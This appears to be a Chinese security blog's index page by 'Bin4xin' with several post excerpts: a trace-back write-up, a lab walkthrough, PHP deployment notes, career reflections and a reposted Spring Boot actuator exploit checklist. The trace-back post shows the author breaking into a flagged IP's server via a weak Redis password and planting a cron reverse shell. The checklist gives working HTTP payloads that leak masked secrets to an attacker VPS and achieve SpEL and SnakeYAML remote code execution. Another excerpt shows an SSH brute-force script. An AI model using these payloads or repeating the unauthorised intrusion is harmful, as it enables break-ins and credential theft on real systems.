《Bin4xin:我的网安从业朔源事件记录》

零:起源

  • 一日,某护网红队支撑群里发了一份朔源报告,鸦雀无声

    • 甲方:小伙伴们接集团要求需对 WAF全流量平台 攻击ip进行朔源…

      • 废佬:这…(甲方你真可爱)
    • 领导1:溯源到攻击端信息是个新的领域,望小伙伴们通过此次集团安排做些尝试性学习和探索, 落实外部可借力工具和资源,[@Bin4xin废佬]也加入此次探索学习中。

      • 废佬:这…(领导你真可爱)
    • 领导2:文件:《全流量、WAF4月8日-4月12日攻击IP(1).xlsx》

      $ more 全流量、WAF4月8日-4月12日攻击IP\(1\).csv    
      223.214.211.46
      36.59.38.115
              
      $ more 全流量、WAF4月8日-4月12日攻击IP\(1\).csv|wc -l
      16570
      
      • 废佬:这…(领导你真可爱)
  • 于是废佬就开始了愉快 boring 的朔源之旅

一:上午、欢乐时光 & fofa安全工程师

鲁迅:

不会朔源的fofa安全工程师不是一个好的信息安全工程师

# 1x01:awk、split & linux

  • 步入主题之前,先对这些文件进行一些简单的操作:
      $ split -l 300 全流量、WAF4月8日-4月12日攻击IP\(1\).csv ips_preview_by300_
      $ cat ips_preview_by300_aa|wc -l                     
         300
      $ ll
        total 1400
        drwxr-xr-x  59 bin4xin  staff    1888  4 14 20:48 ./
        drwxr-xr-x+ 43 bin4xin  staff    1376  4 14 20:45 ../
        -rw-r--r--   1 bin4xin  staff    4548  4 14 20:48 ips_preview_by300_aa
        -rw-r--r--   1 bin4xin  staff    4457  4 14 20:48 ips_preview_by300_ab
        -rw-r--r--   1 bin4xin  staff    4481  4 14 20:48 ips_preview_by300_ac
        ··· 
    

    这样我们就有了若干个300行ip的小文件,更方便我们筛选我们需要的ip,NEXT。

  • just fofa:

# 1x02:Something Interesting

欢乐而又短暂的上午如白驹过隙,一晃而过。


二:下午、枯燥时光 & 渗透测试工程师

# 2x01:nmap、nc & linux shell

终于:发现了一些有趣的:

PORT     STATE  SERVICE         VERSION
22/tcp   open   ssh             OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:03:b9:0b:7b:ab:3f:bf:cd:60:93:57:52:4e:a6:c5 (RSA)
|   256 9d:97:b5:fb:db:92:ed:a7:e3:dd:f9:5f:86:b5:e3:b4 (ECDSA)
|_  256 7b:65:cf:48:84:15:82:ca:be:46:3c:cf:93:63:07:f1 (ED25519)
80/tcp   open   http            nginx
| http-ls: Volume /
| SIZE  TIME               FILENAME
| -     24-Feb-2021 13:21  admin/
| -     24-Feb-2021 09:27  redis/
| -     24-Aug-2017 04:55  staragent/
| -     24-Feb-2021 08:44  www/
| -     24-Feb-2021 08:44  www/htdocs/
| -     13-Apr-2021 19:44  www/logs/
|_
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: Index of /
888/tcp  open   http            nginx
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: 404 Not Found
3306/tcp open   mysql           MySQL 5.5.62-log
6379/tcp open   redis           Redis key-value store
8080/tcp open   http            Apache Tomcat 8.5.63
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: Apache Tomcat/8.5.63
8888/tcp open   http            Ajenti http control panel
  • 事实上:这是一个宝塔面板,8888+888端口;
  • 另一个事实是:这个被WAF报成4月8日-4月12日攻击IP的IP, mysql & redis 均为弱口令。
$ ./redis-cli -h redis_target_ip           
redis_target_ip:6379> get key
(error) NOAUTH Authentication required.
redis_target_ip:6379> 
redis_target_ip:6379> auth 123456
OK
redis_target_ip:6379> get key
(nil)
redis_target_ip:6379> set  xx   "\n* * * * * bash -i >& /dev/tcp/your_vps_target/port 0>&1\n"
OK
redis_target_ip:6379> config set dir /var/spool/cron/
OK
redis_target_ip:6379> config set dbfilename root
OK
redis_target_ip:6379> save
OK
redis_target_ip:6379> quit

# 2x02:bash、Information gathering & Traceability incident

于是我们通过上面步骤获得了服务器权限;awesome ? next more awesome.

通过在服务器的信息搜集,似乎看到了19年刚刚接触服务器的自己,没有任何嘲讽的意思,所有人都是初学者过来的;

NO OFFENCE:-)Thanks

  • 更加了解linux和linux面板,否则就会显得十分业余,不管你是Development, operation and maintenance or security practitioners;
    • 匮乏的linux知识导致的过多ssh连接:
        ps -ef|grep ssh|wc -l
        50
      
    • 错乱的终端与数据库命令运行:
        $ cat /home/admin/.bash_history 
        sudo grep wordpress_admin_passwd /root/env.txt
        /usr/local/mysql/bin/mysql -u root -p123456
        sudo su rooe
        sudo su root
        sudo grep mysql_root_passwd /root/env.txt
        mysql
        alias mysql=/usr/local/mysql/bin/mysql
        mysql
        find / -name mysql.sock
        sudo grep mysql_root_passwd /root/env.txt
        msyql
        sudo su root
        grant all privileges on *.* to 'root'@'%' identified by 'pass-hidden';
        grant all privileges on *.* to 'root'@'%' identified by '123456';
      
    • 错误的linux权限分配:
        $ ps -ef|grep root
        root      7963     1  0 Mar06 ?        00:39:39 /usr/bin/java -Djava.util.logging.config.file=/www/server/apache-tomcat-8.5.63/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Dignore.endorsed.dirs= -classpath /www/server/apache-tomcat-8.5.63/bin/bootstrap.jar:/www/server/apache-tomcat-8.5.63/bin/tomcat-juli.jar -Dcatalina.base=/www/server/apache-tomcat-8.5.63 -Dcatalina.home=/www/server/apache-tomcat-8.5.63 -Djava.io.tmpdir=/www/server/apache-tomcat-8.5.63/temp org.apache.catalina.startup.Bootstrap start
        root     23017     1  0 Mar06 ?        00:00:00 nginx: master process nginx -c conf/nginx.conf
        root     27803     1  0 Feb25 ?        01:17:18 ./redis-server *:6379
        ···
      
  • 同样的:通过history找到面板管理密码;
    • tools.py form BT panel:
        $ cat /root/.bash_history |grep tools
        cd /www/server/panel && python tools.py panel pass-hidden
        $ cat /www/server/panel/tools.py
              
        if __name__ == "__main__":
            type = sys.argv[1]
            if type == 'root':
                set_mysql_root(sys.argv[2])
            elif type == 'panel':
                set_panel_pwd(sys.argv[2])
      

所以,panel模式下对应的是面板密码设置;

至此,我们获得了 root、redis、mysql、BT panel ;而本文并炫技,我们的初衷是朔源:

  • mysql:数据库仅仅是存放论坛系统管理的信息及测试信息;
  • redis:配合 mysql,不必多说;
  • BT panel:www、ftp、sql 等配置均为简单配置,没有参考价值。

三:总结

  • 1、本篇文章的存在意为信息搜集、朔源方向上的抛砖引玉,文笔不佳;
  • 2、结合 # 2x01 及 # 2x02 小结通篇结束并未发现攻击迹象、痕迹;
  • 3、为何被报为攻击IP不得而知。

四:申明

作者:Bin4xin

转载请申明本文链接:《Bin4xin:我的网安从业朔源事件记录》

以上。

[Read More]

辛丑·本命年 年后的一些思考

Mar 13, 2021. | By: Bin4xin

过完年回合肥已经接近一个月之久了,今年是本命年,也希望自己能够能够比20年更加努力。回了公司就按照计划忙些有意义的:

  • 一切正在有条不紊的进行着:

按照新年的规划,过来需要沉淀的便是Shiro框架。过完年回来就面临着护网,在20年靠着这个为公司护网“打下了一片江山”,今年应进一步理解;

说些没用的:

过年回来后,忙里偷闲与学校网安实验室的孩子们开了一次线下交流会,交流会的主要内容就是总结寒假以来的学习过程和心得汇报;因为年纪较小,基本都是刚大一、大二,所以偶尔也要进行大学生活困扰的解惑;

  • 网安实验室队伍安排:
    • 导师: 队伍灵魂;
    • 我的角色: 我想,我在这个队伍里扮演的角色应该是作为行业“过来人”对他们的学习计划进行有效的监督和建议。
    • 攻击队伍(红队)要求:
      • 1.熟悉各种漏洞特征和利用原理;
      • 2.能够基本读懂POC代码所进行的操作,并自己有一定的编程能力和代码审计能力;
      • 3.熟悉市面主流WAF的识别、WAF规则探测、绕过以及攻击WAF后的资产。
    • 防守队伍(蓝队)要求:
      • 1.熟悉各类漏洞形成原因、及时跟进互联网上爆出的各种0day、1day、Nday,并对频繁爆出漏洞的组件有深刻的理解,如WebLogic反序列化、Shiro反序列化、各种(SQL、模版)注入等等;
      • 2.熟悉主流操作系统Linux、Windows的工作原理如软件编译安装能力、集群的独立运维能力以及安全事件朔源能力;
      • 3.能够做到独立部署安全(审计)平台或安全工具,如WAF以及WAF工作涉及的规则库编写。
    • 数据挖掘类,涉及到算法应用等;不多说。
    • 开发类;不多说。

  • 现存问题如下:

如何在现阶段的网安环境下,打造出一支专业化团队:
|__ 1、网安实验室是否能够成立CTF战队?
|__ 2、企业安全专业化安全服务团队?

  • 问题1、针对夺旗战队,我想:当下的拥有的资源便是最好的机会:
    • 能够有本专业导师的指导同时,有一定生源来进行夺旗比赛
      • 选取队长来保证战队的凝聚力和团队活力;
      • 管理团队应当采取比赛军事化管理;包括晨跑、内部攻防训练赛
    • 生源的匹配问题:
      • 在生源筛选时存在的问题:
        • 或许在实验室的生源选择中,应当让所有有该行业兴趣的新生都加入进来,我始终相信的是,大学生活是自身兴趣的发掘过程,对他们的培养过程同时也是考核过程;
        • 因为当下存在的问题较为明显。
      • 部分年轻新生,无法在团队的带跑下跟上节奏,踢出;
      • 小部分自身问题产生各种问题

[Read More]

GainPower靶场渗透历程

Dec 2, 2020. | By: Bin4xin

  • employee1:ssh banner发现问题;
    • 根据提示获得低权限shell
  • employee64:考验脚本编写能力(ssh爆破)
    • bash脚本批量连接
  • programmer:获取sudo shell
    • 通过unshare切换到sudo用户
    • $ su - employee64
    • $ sudo -u programmer unshare
  • vanshal:crontab计划获取shell
    • pspy tool to detected
    • /media/programmer/scripts/backup.sh
  • root:secert zip file
    • zip password crack
    • login ajenti to run root shell.

写个脚本来批量跑试试看:

#!/bin/bash

pwn () {
  read -p 'target ip: ' ip
  sleep 2
  for data in {1..100}
  do
      echo 'Try: ' $data
      sshpass -p 'employee'$data ssh employee$data@$ip 'echo employee'$data' | sudo -S -l'
      printf "\n"
  done
}

pwn

for一下用户名密码{employee+$data}in{1..100},使用sshpass进行批量ssh连接认证,并尝试sudo; 失败如下:

[sudo] employee100 的密码:对不起,用户 employee100 不能在 localhost 上运行 sudo。

成功:

[sudo] employee64 的密码:匹配 %2$s 上 %1$s 的默认条目:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

用户 employee64 可以在 localhost 上运行以下命令:
    (programmer) /usr/bin/unshare

所以用户employee64是拥有sudo权限;

[Read More]

PHP:部署的一揽子问题

Nov 25, 2020. | By: Bin4xin

[Wed Nov 25 17:19:33.475439 2020] [php7:notice] [pid 11872] [client 10.211.55.2:53568] PHP Notice:  Undefined index: step in /var/www/
html/code/BabyOnline1/setup/setupwizard.php on line 4 [Wed Nov 25 17:19:33.475577 2020] [php7:error] [pid 11872] [client 10.211.55.2:53568] 
PHP Fatal error:  Uncaught Error: Class 'DOMDocument' not found in /var/www/html/code/BabyOnline1/setup/setupwizard.php:46\n
Stack trace:\n#0 {main}\n  thrown in /var/www/html/code/BabyOnline1/setup/setupwizard.php on line 46
[Wed Nov 25 17:21:46.224793 2020] [php7:error] [pid 11882] [client 10.211.55.2:53602] PHP Fatal error:  Uncaught Error: 
Call to undefined function mysqli_connect() in 

/var/www/html/code/BabyOnline1/utility/mysqli5.php:39\nStack trace:\n#0 /var/www/html/code/BabyOnline1/utility/fun.class.php(281): 
Conn->__construct('localhost', '3306', 'root', 'tsinglink', 'qx_bbol', 'UTF8', true)\n#1 /var/www/html/code/BabyOnline1/utility/fun.class.php
(255): Utility->CreateDBConnect('localhost', '3306', 'root', 'tsinglink', 'qx_bbol', 'UTF8')\n#2 /var/www/html/code/BabyOnline1/platform/php/
ini.php(41): Utility->__construct()\n#3 /var/www/html/code/BabyOnline1/platform/php/plat_manage.php(5): require_once('/var/www/html/c...')
\n#4 {main}\n  thrown in /var/www/html/code/BabyOnline1/utility/mysqli5.php on line 39, referer: http://10.211.55.4/platform/

提示在/var/www/html/code/BabyOnline1/utility/fun.class.php(281)文件、 /var/www/html/code/BabyOnline1/platform/php/ini.php(41)文件 /var/www/html/code/BabyOnline1/utility/mysqli5.php on line 39文件

第一个fun.class.php文件是实现的日志写入数据库的功能;

function WriterToDB($typeid,$clientAddress,$datetime,$file,$line,$function,$content)
	{
		global $utility;
		if(is_array($content))
		{
			$conn = $utility->CreateDBConnect($_SESSION["DB"]["Host"],$_SESSION["DB"]["Port"],$_SESSION["DB"]["User"],$_SESSION["DB"]["Password"],$_SESSION["DB"]["Name"],$_SESSION["DB"]["Character"]);
			$conn->Query("INSERT INTO `NMIOperationLog` (`Index`,`Operation`,`OperationTime`,`Description`,`ManageDomainUserInfo_Index`,`ManageDomain_Index`,`ManageDomainUserInfo_Identity`,`ManageDomains`,`SqlScript`)VALUES(null,'".$content["Operation"]."','".$content["OperationTime"]."','".addslashes($content["Description"])."','".$content["ManageDomainUserInfo_Index"]."','".$content["ManageDomain_Index"]."','".$content["ManageDomainUserInfo_Identity"]."','".$content["ManageDomains"]."','".addslashes($content["SqlScript"])."') ");
	
			//$log->Writer(1,"NMI",strftime("%Y-%m-%d %H:%M:%S",time()),__FILE__,__LINE__,__FUNCTION__,mysql_error());
			
		}
		return true;
	}

连库WriterToDB实现功能如上;同样的ini.php同样定义了数据库的配置信息包括类型、url和连接信息:

define('LOGSAVETYPE',1);
define('LOGLEVEL',1);

define('DB_TYPE', "mysql"); 
define('IMAGE_URL', "http://61.191.35.32:8580/BabyOnline/");
define('DB_SOURCEFILE_PATH',dirname(dirname(dirname(__FILE__)))."/utility/dbsource.ini");

dbsource.ini文件里面则详细配置了jdbc的配置信息,就不单独放出来了;再来看看最后一个文件,同样是连接数据库,然后发现了一些有趣的: 随意捡了一些构造函数:

function QueryRecordCount($sqlstr)
	{
		if($this->connect)
		{
			unset($row);
			$row=$this->FetchArray($this->Query("SELECT count(1) as RecordCount FROM ".$sqlstr." "));
			return ($row['RecordCount'] > 0 ? $row['RecordCount'] : 0);
		}
		else
		{
			return 0;
		}
	}


if($link->FetchArray($link->query("SELECT * FROM User WHERE `Identity`='$UserId' AND AreaCode='$AreaCode'")))
    {
    ···
    }

咳咳,跑偏了,以上来看就直接修改ini文件就行了。

[Read More]

有关于网络安全行业的一些思考

Sep 25, 2020. | By: Bin4xin

Under construction



在当今网络安全行业趋于商业化的时代,如何能够保持一颗赤忱之心:

  • 当今网络安全之趋势,当在国家安全的大前提下:
    • 教育行业应作为网络安全的”活水源头”,为这个年轻的行业输入足够的年轻血液,所以在此刻:
      应当充分发挥教育职能的同时,对当下应用型、研究型专业的莘莘学子做有必要的引导;
      因为当下很多学生、教师在当下行业无法认清自我,永远无法在正确的时间,做正确的事;

    • 企业在这其中也扮演重要角色: 显而易见的是,传统安全企业也面临着的抉择:
    • 适应市场或者是自己选择游戏规则;
      • 大部分传统安全厂商选择的是适应市场
        • 安服需求;夺旗需求;应付工信部门检查等。。。
      • 爱加密等厂商:
        • 自己创造需求,创造游戏规则。

对处于实习期的学生做好职业引导,网络安全行业在未来十年不会成为国家命脉行业,安全行业仅仅作为安全服务的形式为大众所熟知,如今的网络安全行业:

国家层面:CTF赛事;护网行动;重大节日保障

企业层面:工信局部门检查;等保;自身企业业务安全保障(一般来说,越针对自身企业业务有安全需求的公司,都拥有自己的安全团队)

个人层面:个人数据、隐私、财产问题;

零、当下网络安全行业CTF赛事之我见

[Read More]

不得不谈的:「Spring Boot」未授权渗透

Sep 25, 2020. | By: Bin4xin edit.Source From LandGrey

Spring Boot Vulnerability Exploit CheckList

Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list

声明

这是转载地址若作者介意请联系:「chihou.pro@gmail.com」删除转载文章

目录

零:路由和版本

0x01:路由知识

  • Spring Boot 1.x 版本默认内置路由的根路径以 / 开始,2.x 则统一以 /actuator 开始
  • 有些程序员会自定义 /manage/management项目相关名称 为根路径
  • 默认内置路由名字,如 /env 有时候也会被程序员修改,如修改成 /appenv

0x02:版本知识

Spring Cloud 是基于 Spring Boot 来进行构建服务,并提供如配置管理、服务注册与发现、智能路由等常见功能的帮助快速开发分布式系统的系列框架的有序集合。

常见组件的版本相互依赖关系:

依赖项 版本列表及依赖组件版本
spring-boot-starter-parent spring-boot-starter-parent
spring-boot-dependencies spring-boot-dependencies
spring-cloud-dependencies spring-cloud-dependencies

Spring Cloud 与 Spring Boot 大版本之间的依赖关系:

Spring Cloud Spring Boot
Angel 兼容 Spring Boot 1.2.x
Brixton 兼容 Spring Boot 1.3.x、1.4.x
Camden 兼容 Spring Boot 1.4.x、1.5.x
Dalston 兼容 Spring Boot 1.5.x,不兼容 2.0.x
Edgware 兼容 Spring Boot 1.5.x,不兼容 2.0.x
Finchley 兼容 Spring Boot 2.0.x,不兼容 1.5.x
Greenwich 兼容 Spring Boot 2.1.x
Hoxton 兼容 Spring Boot 2.2.x

Spring Cloud 小版本号的后缀及含义:

版本号后缀 含义
BUILD-SNAPSHOT 快照版,代码不是固定,处于变化之中
MX 里程碑版
RCX 候选发布版
RELEASE 正式发布版
SRX (修复错误和 bug 并再次发布的)正式发布版

一:信息泄露

0x01:路由地址及接口调用详情泄漏

开发环境切换为线上生产环境时,相关人员没有更改配置文件或忘记切换配置环境,导致此漏洞

直接访问以下几个路由,验证漏洞是否存在:

/api-docs
/v2/api-docs
/swagger-ui.html

一些可能会遇到的接口路由变形:

/api.html
/sw/swagger-ui.html
/api/swagger-ui.html
/template/swagger-ui.html
/spring-security-rest/api/swagger-ui.html
/spring-security-oauth-resource/swagger-ui.html

除此之外,下面的路由有时也会包含(或推测出)一些接口地址信息,但是无法获得参数相关信息:

/mappings
/actuator/mappings
/metrics
/actuator/metrics
/beans
/actuator/beans
/configprops
/actuator/configprops

一般来讲,知道 spring boot 应用的相关接口和传参信息并不能算是漏洞

但是可以检查暴露的接口是否存在未授权访问、越权或者其他业务型漏洞。

0x02:配置不当而暴露的路由

主要是因为程序员开发时没有意识到暴露路由可能会造成安全风险,或者没有按照标准流程开发,忘记上线时需要修改/切换生产环境的配置

参考 production-ready-endpointsspring-boot.txt,可能因为配置不当而暴露的默认内置路由可能会有:

/actuator
/auditevents
/autoconfig
/beans
/caches
/conditions
/configprops
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/intergrationgraph
/jolokia
/logfile
/loggers
/liquibase
/metrics
/mappings
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream

其中对寻找漏洞比较重要接口的有:

  • /env/actuator/env

    GET 请求 /env 会泄露环境变量信息,或者配置中的一些用户名,当程序员的属性名命名不规范 (例如 password 写成 psasword、pwd) 时,会泄露密码明文;

    同时有一定概率可以通过 POST 请求 /env 接口设置一些属性,触发相关 RCE 漏洞。

  • /jolokia

    通过 /jolokia/list 接口寻找可以利用的 MBean,触发相关 RCE 漏洞;

  • /trace

    一些 http 请求包访问跟踪信息,有可能发现有效的 cookie 信息

0x03:获取被星号脱敏的密码的明文 (方法一)

访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果

利用条件:

  • 目标网站存在 /jolokia/actuator/jolokia 接口
  • 目标使用了 jolokia-core 依赖(版本要求暂未知)

利用方法:

步骤一: 找到想要获取的属性名

GET 请求目标网站的 /env/actuator/env 接口,搜索 ****** 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。

步骤二: jolokia 调用相关 Mbean 获取明文

将下面示例中的 security.user.password 替换为实际要获取的属性名,直接发包;明文值结果包含在 response 数据包中的 value 键中。

  • 调用 org.springframework.boot Mbean(可能更通用

实际上是调用 org.springframework.boot.admin.SpringApplicationAdminMXBeanRegistrar 类实例的 getProperty 方法

spring 1.x

POST /jolokia
Content-Type: application/json

{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

spring 2.x

POST /actuator/jolokia
Content-Type: application/json

{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}
  • 调用 org.springframework.cloud.context.environment Mbean(需要 spring cloud 相关依赖

实际上是调用 org.springframework.cloud.context.environment.EnvironmentManager 类实例的 getProperty 方法

spring 1.x

POST /jolokia
Content-Type: application/json

{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

spring 2.x

POST /actuator/jolokia
Content-Type: application/json

{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

0x04:获取被星号脱敏的密码的明文 (方法二)

访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果

利用条件:

  • 可以 GET 请求目标网站的 /env
  • 可以 POST 请求目标网站的 /env
  • 可以 POST 请求目标网站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)
  • 目标使用了 spring-cloud-starter-netflix-eureka-client 依赖
  • 目标可以请求攻击者的服务器(请求可出外网)

利用方法:

步骤一: 找到想要获取的属性名

GET 请求目标网站的 /env/actuator/env 接口,搜索 ****** 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。

步骤二: 使用 nc 监听 HTTP 请求

在自己控制的外网服务器上监听 80 端口:

nc -lvk 80
步骤三: 设置 eureka.client.serviceUrl.defaultZone 属性

将下面 http://value:${security.user.password}@your-vps-ip 中的 security.user.password 换成自己想要获取的对应的星号 * 遮掩的属性名;

your-vps-ip 换成自己外网服务器的真实 ip 地址。

spring 1.x

POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://value:${security.user.password}@your-vps-ip

spring 2.x

POST /actuator/env
Content-Type: application/json

{"name":"eureka.client.serviceUrl.defaultZone","value":"http://value:${security.user.password}@your-vps-ip"}
步骤四: 刷新配置

spring 1.x

POST /refresh
Content-Type: application/x-www-form-urlencoded

spring 2.x

POST /actuator/refresh
Content-Type: application/json

步骤五: 解码属性值

正常的话,此时 nc 监听的服务器会收到目标发来的请求,其中包含类似如下 Authorization 头内容:

Authorization: Basic dmFsdWU6MTIzNDU2

将其中的 dmFsdWU6MTIzNDU2部分使用 base64 解码,即可获得类似明文值 value:123456,其中的 123456 即是目标星号 * 脱敏前的属性值明文。

0x05:获取被星号脱敏的密码的明文 (方法三)

访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果

利用条件:

  • 通过 POST /env 设置属性触发目标对外网指定地址发起任意 http 请求
  • 目标可以请求攻击者的服务器(请求可出外网)

利用方法:

参考 UUUUnotfound 提出的 issue-1,可以在目标发外部 http 请求的过程中,在 url path 中利用占位符带出数据

步骤一: 找到想要获取的属性名

GET 请求目标网站的 /env/actuator/env 接口,搜索 ****** 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。

步骤二: 使用 nc 监听 HTTP 请求

在自己控制的外网服务器上监听 80 端口:

nc -lvk 80
步骤三: 触发对外 http 请求
  • spring.cloud.bootstrap.location 方法(同时适用于明文数据中有特殊 url 字符的情况):

spring 1.x

POST /env
Content-Type: application/x-www-form-urlencoded

spring.cloud.bootstrap.location=http://your-vps-ip/?=${security.user.password}

spring 2.x

POST /actuator/env
Content-Type: application/json

{"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/?=${security.user.password}"}
  • eureka.client.serviceUrl.defaultZone 方法(不适用于明文数据中有特殊 url 字符的情况):

spring 1.x

POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://your-vps-ip/${security.user.password}

spring 2.x

POST /actuator/env
Content-Type: application/json

{"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/${security.user.password}"}
步骤四: 刷新配置

spring 1.x

POST /refresh
Content-Type: application/x-www-form-urlencoded

spring 2.x

POST /actuator/refresh
Content-Type: application/json

0x06:获取被星号脱敏的密码的明文 (方法四)

访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果

利用条件:

  • 可正常 GET 请求目标 /heapdump/actuator/heapdump 接口

利用方法:

步骤一: 找到想要获取的属性名

GET 请求目标网站的 /env/actuator/env 接口,搜索 ****** 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。

步骤二: 下载 jvm heap 信息

下载的 heapdump 文件大小通常在 50M—500M 之间,有时候也可能会大于 2G

GET 请求目标的 /heapdump/actuator/heapdump 接口,下载应用实时的 JVM 堆信息

步骤三: 使用 MAT 获得 jvm heap 中的密码明文

参考 文章 方法,使用 Eclipse Memory Analyzer 工具的 OQL 语句 select * from org.springframework.web.context.support.StandardServletEnvironment, 辅助快速过滤分析,获得密码明文

二:远程代码执行

由于 spring boot 相关漏洞可能是多个组件漏洞组合导致的,所以有些漏洞名字起的不太正规,以能区分为准

0x01:whitelabel error page SpEL RCE

利用条件:

  • spring boot 1.1.0-1.1.12、1.2.0-1.2.7、1.3.0
  • 至少知道一个触发 springboot 默认错误页面的接口及参数名

利用方法:

步骤一:找到一个正常传参处

比如发现访问 /article?id=xxx ,页面会报状态码为 500 的错误: Whitelabel Error Page,则后续 payload 都将会在参数 id 处尝试。

步骤二:执行 SpEL 表达式

输入 /article?id=${7*7} ,如果发现报错页面将 7*7 的值 49 计算出来显示在报错页面上,那么基本可以确定目标存在 SpEL 表达式注入漏洞。

由字符串格式转换成 0x** java 字节形式,方便执行任意代码:

# coding: utf-8

result = ""
target = 'open -a Calculator'
for x in target:
    result += hex(ord(x)) + ","
print(result.rstrip(','))

执行 open -a Calculator 命令

${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}

漏洞原理:

  1. spring boot 处理参数值出错,流程进入 org.springframework.util.PropertyPlaceholderHelper 类中
  2. 此时 URL 中的参数值会用 parseStringValue 方法进行递归解析
  3. 其中 ${} 包围的内容都会被 org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的 resolvePlaceholder 方法当作 SpEL 表达式被解析执行,造成 RCE 漏洞

漏洞分析:

SpringBoot SpEL表达式注入漏洞-分析与复现

漏洞环境:

repository/springboot-spel-rce

正常访问:

http://127.0.0.1:9091/article?id=66

执行 open -a Calculator 命令:

http://127.0.0.1:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}

0x02:spring cloud SnakeYAML RCE

利用条件:

  • 可以 POST 请求目标网站的 /env 接口设置属性
  • 可以 POST 请求目标网站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)
  • 目标依赖的 spring-cloud-starter 版本 < 1.3.0.RELEASE
  • 目标可以请求攻击者的 HTTP 服务器(请求可出外网)

利用方法:

步骤一: 托管 yml 和 jar 文件

在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443)

# 使用 python 快速开启 http server

python2 -m SimpleHTTPServer 80
python3 -m http.server 80

在网站根目录下放置后缀为 yml 的文件 example.yml,内容如下:

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://your-vps-ip/example.jar"]
  ]]
]

在网站根目录下放置后缀为 jar 的文件 example.jar,内容是要执行的代码,代码编写及编译方式参考 yaml-payload

步骤二: 设置 spring.cloud.bootstrap.location 属性

spring 1.x

POST /env
Content-Type: application/x-www-form-urlencoded

spring.cloud.bootstrap.location=http://your-vps-ip/example.yml

spring 2.x

POST /actuator/env
Content-Type: application/json

{"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/example.yml"}
步骤三: 刷新配置

spring 1.x

POST /refresh
Content-Type: application/x-www-form-urlencoded

spring 2.x

POST /actuator/refresh
Content-Type: application/json

漏洞原理:

  1. spring.cloud.bootstrap.location 属性被设置为外部恶意 yml 文件 URL 地址
  2. refresh 触发目标机器请求远程 HTTP 服务器上的 yml 文件,获得其内容
  3. SnakeYAML 由于存在反序列化漏洞,所以解析恶意 yml 内容时会完成指定的动作
  4. 先是触发 java.net.URL 去拉取远程 HTTP 服务器上的恶意 jar 文件
  5. 然后是寻找 jar 文件中实现 javax.script.ScriptEngineFactory 接口的类并实例化
  6. 实例化类时执行恶意代码,造成 RCE 漏洞

漏洞分析:

Exploit Spring Boot Actuator 之 Spring Cloud Env 学习笔记

漏洞环境:

repository/springcloud-snakeyaml-rce

正常访问:

http://127.0.0.1:9092/env

0x03:eureka xstream deserialization RCE

利用条件:

  • 可以 POST 请求目标网站的 /env 接口设置属性
  • 可以 POST 请求目标网站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)
